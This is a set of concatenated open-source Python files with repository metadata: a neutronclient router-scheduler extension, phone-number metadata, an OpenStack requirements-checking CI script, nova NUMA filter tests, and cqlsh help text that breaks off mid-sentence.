resource_path = '/%s/%%s' % resource_plural
versions = ['2.0']
allow_names = True
class HostingDeviceHostingRouterList(extension.ClientExtensionList,
HostingDeviceHostingRouter):
shell_command = 'cisco-router-list-hosting-devices'
list_columns = ['id', 'name', 'status', 'admin_state_up', 'template_id']
def get_parser(self, prog_name):
parser = super(HostingDeviceHostingRouterList, self).get_parser(
prog_name)
parser.add_argument('router',
help=_('Name or id of router to query.'))
return parser
def call_server(self, neutron_client, search_opts, parsed_args):
_id = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'router', parsed_args.router)
data = self.list_hosting_devices_hosting_routers(neutron_client, _id,
**search_opts)
return data
def list_hosting_devices_hosting_routers(self, client, router_id,
**_params):
"""Fetches a list of hosting devices hosting a router."""
return client.get((client.router_path + L3_ROUTER_DEVICES) %
router_id, params=_params)
|
Gitweijie/first_project
|
networking_cisco/neutronclient/routerscheduler.py
|
Python
|
apache-2.0
| 7,544
|
# -*- coding: utf-8 -*-
from plaso.parsers.bencode_plugins import transmission
from plaso.parsers.bencode_plugins import utorrent
|
ostree/plaso
|
plaso/parsers/bencode_plugins/__init__.py
|
Python
|
apache-2.0
| 131
|
"""Auto-generated file, do not edit by hand. IE metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_IE = PhoneMetadata(id='IE', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='[159]\\d{2,5}', possible_number_pattern='\\d{3,6}'),
toll_free=PhoneNumberDesc(national_number_pattern='116(?:00[06]|1(?:11|23))', possible_number_pattern='\\d{6}', example_number='116000'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='112|999', possible_number_pattern='\\d{3}', example_number='112'),
short_code=PhoneNumberDesc(national_number_pattern='11(?:2|6(?:00[06]|1(?:11|23)))|51210|999', possible_number_pattern='\\d{3,6}', example_number='112'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
carrier_specific=PhoneNumberDesc(national_number_pattern='51210', possible_number_pattern='\\d{5}'),
short_data=True)
|
roubert/python-phonenumbers
|
python/phonenumbers/shortdata/region_IE.py
|
Python
|
apache-2.0
| 1,071
|
#! /usr/bin/env python
# Copyright (C) 2011 OpenStack, LLC.
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import collections
import contextlib
import os
import shlex
import shutil
import subprocess
import sys
import tempfile
requirement = None
project = None
def run_command(cmd):
print(cmd)
cmd_list = shlex.split(str(cmd))
p = subprocess.Popen(cmd_list, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
if p.returncode != 0:
raise SystemError(err)
return (out.strip(), err.strip())
class RequirementsList(object):
def __init__(self, name, project):
self.name = name
self.reqs_by_file = {}
self.project = project
self.failed = False
@property
def reqs(self):
return {k: v for d in self.reqs_by_file.values()
for k, v in d.items()}
def extract_reqs(self, content):
reqs = collections.defaultdict(set)
parsed = requirement.parse(content)
for name, entries in parsed.items():
if not name:
# Comments and other unprocessed lines
continue
list_reqs = [r for (r, line) in entries]
# Strip the comments out before checking if there are duplicates
list_reqs_stripped = [r._replace(comment='') for r in list_reqs]
if len(list_reqs_stripped) != len(set(list_reqs_stripped)):
print("Requirements file has duplicate entries "
"for package %s : %r." % (name, list_reqs))
self.failed = True
reqs[name].update(list_reqs)
return reqs
def process(self, strict=True):
"""Convert the project into ready to use data.
- an iterable of requirement sets to check
- each set has the following rules:
- each has a list of Requirements objects
- duplicates are not permitted within that list
"""
print("Checking %(name)s" % {'name': self.name})
# First, parse.
for fname, content in self.project.get('requirements', {}).items():
print("Processing %(fname)s" % {'fname': fname})
if strict and not content.endswith('\n'):
print("Requirements file %s does not "
"end with a newline." % fname)
self.reqs_by_file[fname] = self.extract_reqs(content)
for name, content in project.extras(self.project).items():
print("Processing .[%(extra)s]" % {'extra': name})
self.reqs_by_file[name] = self.extract_reqs(content)
def grab_args():
"""Grab and return arguments"""
parser = argparse.ArgumentParser(
description="Check if project requirements have changed"
)
parser.add_argument('--local', action='store_true',
help='check local changes (not yet in git)')
parser.add_argument('branch', nargs='?', default='master',
help='target branch for diffs')
parser.add_argument('--zc', help='what zuul cloner to call')
parser.add_argument('--reqs', help='use a specified requirements tree')
return parser.parse_args()
@contextlib.contextmanager
def tempdir():
try:
reqroot = tempfile.mkdtemp()
yield reqroot
finally:
shutil.rmtree(reqroot)
def install_and_load_requirements(reqroot, reqdir):
sha = run_command("git --git-dir %s/.git rev-parse HEAD" % reqdir)[0]
print "requirements git sha: %s" % sha
req_venv = os.path.join(reqroot, 'venv')
req_pip = os.path.join(req_venv, 'bin/pip')
req_lib = os.path.join(req_venv, 'lib/python2.7/site-packages')
out, err = run_command("virtualenv " + req_venv)
out, err = run_command(req_pip + " install " + reqdir)
sys.path.append(req_lib)
global project
global requirement
from openstack_requirements import project # noqa
from openstack_requirements import requirement # noqa
def _is_requirement_in_global_reqs(req, global_reqs):
# Compare all fields except the extras field as the global
# requirements should not have any lines with the extras syntax
# example: oslo.db[xyz]<1.2.3
for req2 in global_reqs:
if (req.package == req2.package and
req.location == req2.location and
req.specifiers == req2.specifiers and
req.markers == req2.markers and
req.comment == req2.comment):
return True
return False
def main():
args = grab_args()
branch = args.branch
failed = False
# build a list of requirements from the global list in the
# openstack/requirements project so we can match them to the changes
with tempdir() as reqroot:
# Only clone requirements repo if no local repo is specified
# on the command line.
if args.reqs is None:
reqdir = os.path.join(reqroot, "openstack/requirements")
if args.zc is not None:
zc = args.zc
else:
zc = '/usr/zuul-env/bin/zuul-cloner'
out, err = run_command("%(zc)s "
"--cache-dir /opt/git "
"--workspace %(root)s "
"git://git.openstack.org "
"openstack/requirements"
% dict(zc=zc, root=reqroot))
            print(out)
            print(err)
else:
reqdir = args.reqs
install_and_load_requirements(reqroot, reqdir)
global_reqs = requirement.parse(
open(reqdir + '/global-requirements.txt', 'rt').read())
for k, entries in global_reqs.items():
# Discard the lines: we don't need them.
global_reqs[k] = set(r for (r, line) in entries)
cwd = os.getcwd()
# build a list of requirements in the proposed change,
# and check them for style violations while doing so
head = run_command("git rev-parse HEAD")[0]
head_proj = project.read(cwd)
head_reqs = RequirementsList('HEAD', head_proj)
# Don't apply strict parsing rules to stable branches.
# Reasoning is:
# - devstack etc protect us from functional issues
# - we're backporting to stable, so guarding against
# aesthetics and DRY concerns is not our business anymore
# - if in future we have other not-functional linty style
# things to add, we don't want them to affect stable
# either.
head_strict = not branch.startswith('stable/')
head_reqs.process(strict=head_strict)
if not args.local:
# build a list of requirements already in the target branch,
# so that we can create a diff and identify what's being changed
run_command("git remote update")
run_command("git checkout remotes/origin/%s" % branch)
branch_proj = project.read(cwd)
# switch back to the proposed change now
run_command("git checkout %s" % head)
else:
branch_proj = {'root': cwd}
branch_reqs = RequirementsList(branch, branch_proj)
# Don't error on the target branch being broken.
branch_reqs.process(strict=False)
# iterate through the changing entries and see if they match the global
# equivalents we want enforced
for fname, freqs in head_reqs.reqs_by_file.items():
print("Validating %(fname)s" % {'fname': fname})
for name, reqs in freqs.items():
counts = {}
if (name in branch_reqs.reqs and
reqs == branch_reqs.reqs[name]):
# Unchanged [or a change that preserves a current value]
continue
if name not in global_reqs:
failed = True
print("Requirement %s not in openstack/requirements" %
str(reqs))
continue
if reqs == global_reqs[name]:
continue
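                # Count the local requirement lines per extras marker ('' when
                # no extra is used) so we can check below that each marker has
                # as many lines as the global entry.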
for req in reqs:
if req.extras:
for extra in req.extras:
counts[extra] = counts.get(extra, 0) + 1
else:
counts[''] = counts.get('', 0) + 1
if not _is_requirement_in_global_reqs(
req, global_reqs[name]):
failed = True
print("Requirement for package %s : %s does "
"not match openstack/requirements value : %s" % (
name, str(req), str(global_reqs[name])))
for extra, count in counts.items():
if count != len(global_reqs[name]):
failed = True
print("Package %s%s requirement does not match "
"number of lines (%d) in "
"openstack/requirements" % (
name,
('[%s]' % extra) if extra else '',
len(global_reqs[name])))
# report the results
if failed or head_reqs.failed or branch_reqs.failed:
sys.exit(1)
print("Updated requirements match openstack/requirements.")
if __name__ == '__main__':
main()
|
hedvig/project-config
|
jenkins/scripts/project-requirements-change.py
|
Python
|
apache-2.0
| 10,166
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_serialization import jsonutils
from nova import objects
from nova.objects import base as obj_base
from nova.scheduler.filters import numa_topology_filter
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.scheduler import fakes
from nova.virt import hardware
class TestNUMATopologyFilter(test.NoDBTestCase):
def setUp(self):
super(TestNUMATopologyFilter, self).setUp()
self.filt_cls = numa_topology_filter.NUMATopologyFilter()
def test_numa_topology_filter_pass(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_numa_instance_no_numa_host_fail(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1', {'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_numa_host_no_numa_instance_pass(self):
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = None
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_fail_fit(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([2]), memory=512),
objects.InstanceNUMACell(id=2, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_fail_memory(self):
self.flags(ram_allocation_ratio=1)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]),
memory=1024),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_fail_cpu(self):
self.flags(cpu_allocation_ratio=1)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3, 4, 5]),
memory=512)])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_pass_set_limit(self):
self.flags(cpu_allocation_ratio=21)
self.flags(ram_allocation_ratio=1.3)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
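        # The limits written back to the host should be the cell resources
        # scaled by the allocation ratios (here presumably 2 pCPUs * 21 = 42
        # and 512 MB * 1.3 ~= 665, given fakes.NUMA_TOPOLOGY).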
limits_topology = hardware.VirtNUMALimitTopology.from_json(
host.limits['numa_topology'])
self.assertEqual(limits_topology.cells[0].cpu_limit, 42)
self.assertEqual(limits_topology.cells[1].cpu_limit, 42)
self.assertEqual(limits_topology.cells[0].memory_limit, 665)
self.assertEqual(limits_topology.cells[1].memory_limit, 665)
|
orbitfp7/nova
|
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
Python
|
apache-2.0
| 7,379
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .cql3handling import simple_cql_types
class CQLHelpTopics(object):
def get_help_topics(self):
return [ t[5:] for t in dir(self) if t.startswith('help_') ]
def print_help_topic(self, topic):
getattr(self, 'help_' + topic.lower())()
def help_types(self):
print "\n CQL types recognized by this version of cqlsh:\n"
for t in simple_cql_types:
print ' ' + t
print """
For information on the various recognizable input formats for these
types, or on controlling the formatting of cqlsh query output, see
one of the following topics:
HELP TIMESTAMP_INPUT
HELP BLOB_INPUT
HELP UUID_INPUT
HELP BOOLEAN_INPUT
HELP TEXT_OUTPUT
HELP TIMESTAMP_OUTPUT
"""
def help_timestamp_input(self):
print """
Timestamp input
CQL supports any of the following ISO 8601 formats for timestamp
specification:
yyyy-mm-dd HH:mm
yyyy-mm-dd HH:mm:ss
yyyy-mm-dd HH:mmZ
yyyy-mm-dd HH:mm:ssZ
yyyy-mm-dd'T'HH:mm
yyyy-mm-dd'T'HH:mmZ
yyyy-mm-dd'T'HH:mm:ss
yyyy-mm-dd'T'HH:mm:ssZ
yyyy-mm-dd
yyyy-mm-ddZ
The Z in these formats refers to an RFC-822 4-digit time zone,
expressing the time zone's difference from UTC. For example, a
timestamp in Pacific Standard Time might be given thus:
2012-01-20 16:14:12-0800
If no time zone is supplied, the current time zone for the Cassandra
server node will be used.
"""
def help_blob_input(self):
print """
Blob input
        CQL blob data must be specified in a string literal as hexadecimal
data. Example: to store the ASCII values for the characters in the
string "CQL", use '43514c'.
"""
def help_uuid_input(self):
print """
UUID input
        UUIDs may be specified in CQL using 32 hexadecimal characters,
split up using dashes in the standard UUID format:
XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
"""
def help_boolean_input(self):
print """
Boolean input
CQL accepts the strings 'true' and 'false' (case insensitive)
as input for boolean types.
"""
def help_timestamp_output(self):
print """
Timestamp output
Cqlsh will display timestamps in the following format by default:
yyyy-mm-dd HH:mm:ssZ
which is a format acceptable as CQL timestamp input as well.
The output format can be changed by setting 'time_format' property
in the [ui] section of .cqlshrc file.
"""
def help_text_output(self):
print """
Textual output
When control characters, or other characters which can't be encoded
in your current locale, are found in values of 'text' or 'ascii'
types, it will be shown as a backslash escape. If color is enabled,
any such backslash escapes will be shown in a different color from
the surrounding text.
Unicode code points in your data will be output intact, if the
encoding for your locale is capable of decoding them. If you prefer
that non-ascii characters be shown with Python-style "\\uABCD"
escape sequences, invoke cqlsh with an ASCII locale (for example,
by setting the $LANG environment variable to "C").
"""
help_ascii_output = help_text_output
def help_create_index(self):
print """
CREATE INDEX [<indexname>] ON <cfname> ( <colname> );
A CREATE INDEX statement is used to create a new, automatic secondary
index on the given CQL table, for the named column. A name for the
index itself can be specified before the ON keyword, if desired. A
single column name must be specified inside the parentheses. It is not
necessary for the column to exist on any current rows (Cassandra is
schema-optional), but the column must already have a type (specified
during the CREATE TABLE, or added afterwards with ALTER TABLE).
"""
def help_drop(self):
print """
There are different variants of DROP. For more information, see
one of the following:
HELP DROP_KEYSPACE;
HELP DROP_TABLE;
HELP DROP_INDEX;
"""
def help_drop_keyspace(self):
print """
DROP KEYSPACE <keyspacename>;
A DROP KEYSPACE statement results in the immediate, irreversible
removal of a keyspace, including all column families in it, and all
data contained in those column families.
"""
def help_drop_table(self):
print """
DROP TABLE <tablename>;
A DROP TABLE statement results in the immediate, irreversible
removal of a CQL table and the underlying column family, including all
data contained in it.
"""
help_drop_columnfamily = help_drop_table
def help_drop_index(self):
print """
DROP INDEX <indexname>;
A DROP INDEX statement is used to drop an existing secondary index.
"""
def help_truncate(self):
print """
TRUNCATE <tablename>;
TRUNCATE accepts a single argument for the table name, and permanently
removes all data from it.
"""
def help_create(self):
print """
There are different variants of CREATE. For more information, see
one of the following:
HELP CREATE_KEYSPACE;
HELP CREATE_TABLE;
HELP CREATE_INDEX;
"""
def help_use(self):
print """
USE <keyspacename>;
Tells cqlsh and the connected Cassandra instance that you will be
working in the given keyspace. All subsequent operations on tables
or indexes will be in the context of this keyspace, unless otherwise
specified, until another USE command is issued or the connection
terminates.
As always, when a keyspace name does not work as a normal identifier or
number, it can be quoted using single quotes (CQL 2) or double quotes
(CQL 3).
"""
def help_create_table(self):
print """
CREATE TABLE <cfname> ( <colname> <type> PRIMARY KEY [,
<colname> <type> [, ...]] )
[WITH <optionname> = <val> [AND <optionname> = <val> [...]]];
CREATE TABLE statements create a new CQL table under the current
keyspace. Valid table names are strings of alphanumeric characters and
underscores, which begin with a letter.
Each table requires a primary key, which will correspond to the
underlying columnfamily key and key validator. It's important to
note that the key type you use must be compatible with the partitioner
in use. For example, OrderPreservingPartitioner and
CollatingOrderPreservingPartitioner both require UTF-8 keys.
In cql3 mode, a table can have multiple columns composing the primary
key (see HELP COMPOUND_PRIMARY_KEYS).
For more information, see one of the following:
HELP CREATE_TABLE_TYPES;
HELP CREATE_TABLE_OPTIONS;
"""
help_create_columnfamily = help_create_table
def help_compound_primary_keys(self):
print """
CREATE TABLE <cfname> ( <partition_key> <type>, <clustering_key1> type, <clustering_key2> type,
[, ...]], PRIMARY KEY (<partition_key>, <clustering_key1>, <clustering_key2>);
CREATE TABLE allows a primary key composed of multiple columns. When this is the case, specify
the columns that take part in the compound key after all columns have been specified.
, PRIMARY KEY( <key1>, <key2>, ... )
The partitioning key itself can be a compound key, in which case the first element of the PRIMARY KEY
phrase should be parenthesized, as
PRIMARY KEY ((<partition_key_part1>, <partition_key_part2>), <clustering_key>)
"""
def help_create_table_types(self):
print """
CREATE TABLE: Specifying column types
CREATE ... (KEY <type> PRIMARY KEY,
othercol <type>) ...
It is possible to assign columns a type during table creation. Columns
configured with a type are validated accordingly when a write occurs,
and intelligent CQL drivers and interfaces will be able to decode the
column values correctly when receiving them. Column types are specified
as a parenthesized, comma-separated list of column term and type pairs.
See HELP TYPES; for the list of recognized types.
"""
help_create_columnfamily_types = help_create_table_types
def help_create_table_options(self):
print """
CREATE TABLE: Specifying columnfamily options
CREATE TABLE blah (...)
WITH optionname = val AND otheroption = val2;
A number of optional keyword arguments can be supplied to control the
configuration of a new CQL table, such as the size of the associated
row and key caches for the underlying Cassandra columnfamily. Consult
your CQL reference for the complete list of options and possible
values.
"""
help_create_columnfamily_options = help_create_table_options
def help_alter_alter(self):
print """
ALTER TABLE: altering existing typed columns
ALTER TABLE addamsFamily ALTER lastKnownLocation TYPE uuid;
ALTER TABLE ... ALTER changes the expected storage type for a column.
The column must already have a type in the column family metadata. The
column may or may not already exist in current rows-- but be aware that
no validation of existing data is done. The bytes stored in values for
that column will remain unchanged, and if existing data is not
deserializable according to the new type, this may cause your CQL
driver or interface to report errors.
"""
def help_alter_add(self):
print """
ALTER TABLE: adding a typed column
ALTER TABLE addamsFamily ADD gravesite varchar;
The ALTER TABLE ... ADD variant adds a typed column to a column
family. The column must not already have a type in the column family
metadata. See the warnings on HELP ALTER_ALTER regarding the lack of
validation of existing data; they apply here as well.
"""
def help_alter_drop(self):
print """
ALTER TABLE: dropping a typed column
ALTER TABLE addamsFamily DROP gender;
An ALTER TABLE ... DROP statement removes the type of a column
from the column family metadata. Note that this does _not_ remove the
column from current rows; it just removes the metadata saying that the
bytes stored under that column are expected to be deserializable
according to a certain type.
"""
def help_alter_with(self):
print """
ALTER TABLE: changing column family properties
ALTER TABLE addamsFamily WITH comment = 'Glad to be here!'
AND read_repair_chance = 0.2;
An ALTER TABLE ... WITH statement makes adjustments to the
table properties, as defined when the table was created (see
HELP CREATE_TABLE_OPTIONS and your Cassandra documentation for
information about the supported parameter names and values).
"""
def help_delete_columns(self):
print """
DELETE: specifying columns
DELETE col1, col2, col3 FROM ...
Following the DELETE keyword is an optional comma-delimited list of
column name terms. When no column names are given, the remove applies
to the entire row(s) matched by the WHERE clause.
When column names do not parse as valid CQL identifiers, they can be
quoted in single quotes (CQL 2) or double quotes (CQL 3).
"""
def help_delete_where(self):
print """
DELETE: specifying rows
DELETE ... WHERE keycol = 'some_key_value';
DELETE ... WHERE keycol1 = 'val1' AND keycol2 = 'val2';
DELETE ... WHERE keycol IN (key1, key2);
The WHERE clause is used to determine to which row(s) a DELETE
applies. The first form allows the specification of a precise row
by specifying a particular primary key value (if the primary key has
multiple columns, values for each must be given). The second form
allows a list of key values to be specified using the IN operator
and a parenthesized list of comma-delimited key values.
"""
def help_update_set(self):
print """
UPDATE: Specifying Columns and Row
UPDATE ... SET name1 = value1, name2 = value2
WHERE <key> = keyname;
UPDATE ... SET name1 = value1, name2 = value2
WHERE <key> IN ('<key1>', '<key2>', ...)
Rows are created or updated by supplying column names and values in
term assignment format. Multiple columns can be set by separating the
name/value pairs using commas.
"""
def help_update_counters(self):
print """
UPDATE: Updating Counter Columns
UPDATE ... SET name1 = name1 + <value> ...
UPDATE ... SET name1 = name1 - <value> ...
Counter columns can be incremented or decremented by an arbitrary
numeric value though the assignment of an expression that adds or
subtracts the value.
"""
def help_update_where(self):
print """
UPDATE: Selecting rows to update
UPDATE ... WHERE <keyname> = <keyval>;
UPDATE ... WHERE <keyname> IN (<keyval1>, <keyval2>, ...);
UPDATE ... WHERE <keycol1> = <keyval1> AND <keycol2> = <keyval2>;
Each update statement requires a precise set of keys to be specified
using a WHERE clause.
If the table's primary key consists of multiple columns, an explicit
value must be given for each for the UPDATE statement to make sense.
"""
def help_select_table(self):
print """
SELECT: Specifying Table
SELECT ... FROM [<keyspace>.]<tablename> ...
The FROM clause is used to specify the CQL table applicable to a SELECT
query. The keyspace in which the table exists can optionally be
specified along with the table name, separated by a dot (.). This will
not change the current keyspace of the session (see HELP USE).
"""
help_select_columnfamily = help_select_table
def help_select_where(self):
print """
SELECT: Filtering rows
SELECT ... WHERE <key> = keyname AND name1 = value1
        SELECT ... WHERE <key> >= startkey and <key> <= endkey AND name1 = value1
SELECT ... WHERE <key> IN ('<key>', '<key>', '<key>', ...)
The WHERE clause provides for filtering the rows that appear in
results. The clause can filter on a key name, or range of keys, and in
the case of indexed columns, on column values. Key filters are
specified using the KEY keyword or key alias name, a relational
operator (one of =, >, >=, <, and <=), and a term value. When terms
appear on both sides of a relational operator it is assumed the filter
applies to an indexed column. With column index filters, the term on
the left of the operator is the name, the term on the right is the
value to filter _on_.
Note: The greater-than and less-than operators (> and <) result in key
ranges that are inclusive of the terms. There is no supported notion of
"strictly" greater-than or less-than; these operators are merely
supported as aliases to >= and <=.
"""
def help_select_limit(self):
print """
SELECT: Limiting results
SELECT ... WHERE <clause> [LIMIT n] ...
Limiting the number of rows returned can be achieved by adding the
LIMIT option to a SELECT expression. LIMIT defaults to 10,000 when left
unset.
"""
class CQL3HelpTopics(CQLHelpTopics):
def help_create_keyspace(self):
print """
CREATE KEYSPACE <ksname>
WITH replication = {'class':'<strategy>' [,'<option>':<val>]};
The CREATE KEYSPACE statement creates a new top-level namespace (aka
"keyspace"). Valid names are any string constructed of alphanumeric
characters and underscores. Names which do not work as valid
identifiers or integers should be quoted as string literals. Properties
such as replication strategy and count are specified during creation
as key-value pairs in the 'replication' map:
class [required]: The name of the replication strategy class
which should be used for the new keyspace. Some often-used classes
are SimpleStrategy and NetworkTopologyStrategy.
other options [optional]: Most strategies require additional arguments
which can be supplied as key-value pairs in the 'replication' map.
Examples:
To create a keyspace with NetworkTopologyStrategy and strategy option of "DC1"
with a value of "1" and "DC2" with a value of "2" you would use
the following statement:
CREATE KEYSPACE <ksname>
WITH replication = {'class':'NetworkTopologyStrategy', 'DC1':1, 'DC2':2};
To create a keyspace with SimpleStrategy and "replication_factor" option
with a value of "3" you would use this statement:
CREATE KEYSPACE <ksname>
WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};
"""
def help_begin(self):
print """
BEGIN [UNLOGGED|COUNTER] BATCH [USING TIMESTAMP <timestamp>]
<insert or update or delete statement> ;
[ <another insert or update or delete statement ;
[...]]
APPLY BATCH;
BATCH supports setting a client-supplied optional global timestamp
which will be used for each of the operations included in the batch.
Only data modification statements (specifically, UPDATE, INSERT,
and DELETE) are allowed in a BATCH statement. BATCH is _not_ an
analogue for SQL transactions.
_NOTE: Counter mutations are allowed only within COUNTER batches._
_NOTE: While there are no isolation guarantees, UPDATE queries are
atomic within a given record._
"""
help_apply = help_begin
def help_select(self):
print """
SELECT <selectExpr>
FROM [<keyspace>.]<table>
[WHERE <clause>]
[ORDER BY <colname> [DESC]]
[LIMIT m];
SELECT is used to read one or more records from a CQL table. It returns
a set of rows matching the selection criteria specified.
For more information, see one of the following:
HELP SELECT_EXPR
HELP SELECT_TABLE
HELP SELECT_WHERE
HELP SELECT_LIMIT
"""
def help_delete(self):
print """
DELETE [<col1> [, <col2>, ...] FROM [<keyspace>.]<tablename>
[USING TIMESTAMP <timestamp>]
WHERE <keyname> = <keyvalue>;
A DELETE is used to perform the removal of one or more columns from one
or more rows. Each DELETE statement requires a precise set of row keys
to be specified using a WHERE clause and the KEY keyword or key alias.
For more information, see one of the following:
HELP DELETE_USING
HELP DELETE_COLUMNS
HELP DELETE_WHERE
"""
def help_delete_using(self):
print """
DELETE: the USING clause
DELETE ... USING TIMESTAMP <timestamp>;
<timestamp> defines the optional timestamp for the new tombstone
record. It must be an integer. Cassandra timestamps are generally
specified using milliseconds since the Unix epoch (1970-01-01 00:00:00
UTC).
"""
def help_update(self):
print """
UPDATE [<keyspace>.]<columnFamily>
[USING [TIMESTAMP <timestamp>]
[AND TTL <timeToLive>]]
SET name1 = value1, name2 = value2 WHERE <keycol> = keyval;
An UPDATE is used to write one or more columns to a record in a table.
No results are returned. The record's primary key must be completely
and uniquely specified; that is, if the primary key includes multiple
columns, all must be explicitly given in the WHERE clause.
Statements begin with the UPDATE keyword followed by the name of the
table to be updated.
For more information, see one of the following:
HELP UPDATE_USING
HELP UPDATE_SET
HELP UPDATE_COUNTERS
HELP UPDATE_WHERE
"""
def help_update_using(self):
print """
UPDATE: the USING clause
UPDATE ... USING TIMESTAMP <timestamp>;
UPDATE ... USING TTL <timeToLive>;
The USING clause allows setting of certain query and data parameters.
If multiple parameters need to be set, these may be joined using AND.
Example:
UPDATE ... USING TTL 43200 AND TIMESTAMP 1351620509603
<timestamp> defines the optional timestamp for the new column value(s).
It must be an integer. Cassandra timestamps are generally specified
using milliseconds since the Unix epoch (1970-01-01 00:00:00 UTC).
<timeToLive> defines the optional time to live (TTL) in seconds for the
new column value(s). It must be an integer.
"""
def help_insert(self):
print """
INSERT INTO [<keyspace>.]<tablename>
( <colname1>, <colname2> [, <colname3> [, ...]] )
VALUES ( <colval1>, <colval2> [, <colval3> [, ...]] )
[USING TIMESTAMP <timestamp>]
[AND TTL <timeToLive>];
An INSERT is used to write one or more columns to a record in a
CQL table. No results are returned.
Values for all component columns in the table's primary key must
be given. Also, there must be at least one non-primary-key column
specified (Cassandra rows are not considered to exist with only
a key and no associated columns).
Unlike in SQL, the semantics of INSERT and UPDATE are identical.
In either case a record is created if none existed before, and
        updated when it does. For more information, see one of the
